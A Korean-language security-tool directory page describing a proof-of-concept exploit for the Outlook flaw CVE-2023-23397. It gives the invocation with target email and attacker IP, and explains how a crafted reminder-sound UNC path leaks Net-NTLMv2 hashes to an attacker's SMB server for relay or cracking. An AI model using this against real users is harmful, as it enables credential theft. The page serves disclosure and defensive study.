Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-23397 — CVE-2023-23397 PoC | Kitploit
도구/GitHubGitHub/vlad-a-man/cve-2023-23397
Password AttacksPayload GenerationVulnerability AnalysisExploitationPhishingRed Teaming
GitHubvlad-a-man/cve-2023-23397

CVE-2023-23397

CVE-2023-23397 PoC

저장소 보기
823년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-23397 개념 증명

이것은 Windows Microsoft Outlook 클라이언트의 취약점인 CVE-2023-23397에 대한 개념 증명(PoC) 익스플로잇입니다.

사전 요구 사항

  • Python 3
  • pywin32 패키지

사용 방법

Windows

  1. 필요한 pywin32 패키지를 설치하려면 pip install pywin32를 실행하세요.
  2. 다음 명령으로 스크립트를 실행합니다: python Exploit.py <save_or_send> <target_email> <attacker_ip>.

Kali Linux

  1. 필요한 pywin32 패키지를 설치하려면 pip install pywin32를 실행하세요.
  2. Metasploit의 SMB 모듈과 같은 SMB 서버를 공격자 머신에서 시작합니다.
  3. 다음 명령으로 스크립트를 실행합니다: python Exploit.py <save_or_send> <target_email> <attacker_ip>.

옵션

  • <save_or_send>: "save" 또는 "send" 중에서 선택합니다. "save"는 악성 이메일을 파일로 저장하고, "send"는 이메일을 대상에게 직접 전송합니다.
  • <target_email>: 대상 사용자의 이메일 주소입니다.
  • <attacker_ip>: 공격자의 SMB 서버 IP 주소입니다.

CVE-2023-23397 고수준 개요

이 문서는 Windows Microsoft Outlook 클라이언트의 취약점인 CVE-2023-23397에 대한 고수준 개요입니다.

설명

CVE-2023-23397은 공격자가 악성 이메일을 제작할 수 있게 하는 취약점으로, Outlook 클라이언트가 이 이메일을 처리하면 대상 사용자의 Net-NTLMv2 해시가 자동으로 유출됩니다. 이 익스플로잇을 트리거하기 위해 사용자 상호 작용이 필요하지 않습니다. 유출된 해시는 릴레이 공격에 사용하거나 기본 자격 증명을 크랙하는 데 사용할 수 있습니다.

이 취약점은 Outlook이 이메일 메시지에서 PidLidReminderFileParameter 속성을 처리하는 방식 때문에 존재합니다. 이 속성은 메시지 발신자가 회의 알림과 같은 항목에 대한 사용자 지정 알림음을 설정할 수 있게 해줍니다. 공격자가 제어하는 SMB 서버를 가리키는 UNC(Universal Naming Convention) 경로가 포함된 사용자 지정 PidLidReminderFileParameter 속성으로 메시지를 제작하면, 공격자는 대상의 Outlook 클라이언트가 SMB 서버에 연결할 때 Net-NTLMv2 해시를 유출하도록 만들 수 있습니다.

공격 단계

  1. 공격자는 자신의 SMB 서버를 가리키는 UNC 경로가 포함된 사용자 지정 PidLidReminderFileParameter 속성으로 악성 이메일을 제작합니다.
  2. 대상 사용자는 Outlook 클라이언트에서 이메일을 수신합니다.
  3. Outlook은 이메일을 처리하고 PidLidReminderFileParameter 속성에 지정된 사용자 지정 알림음 파일을 가져오려고 시도합니다.
  4. Outlook이 공격자가 제어하는 SMB 서버에 연결할 때 대상 사용자의 Net-NTLMv2 해시가 유출됩니다.
  5. 그런 다음 공격자는 유출된 해시를 NTLMv2를 지원하는 다른 시스템에 대한 릴레이 공격에 사용하거나, 해시를 크랙하여 기본 평문 자격 증명을 얻으려고 시도할 수 있습니다.

익스플로잇 사용법

제공된 개념 증명(PoC) 익스플로잇 스크립트는 사용자 지정 PidLidReminderFileParameter 속성이 있는 악성 이메일을 생성한 다음, 파일로 저장하거나 대상 이메일 주소로 직접 전송합니다. 공격자는 유출된 Net-NTLMv2 해시를 캡처하기 위해 SMB 서버를 설정해야 합니다.

참고 사항

이 고수준 개요는 교육 목적으로만 제공됩니다. 취약점과 그 영향을 이해하면 보안 관행을 개선하고 유사한 공격에 대한 효과적인 방어를 개발하는 데 도움이 될 수 있습니다.

도구 다운로드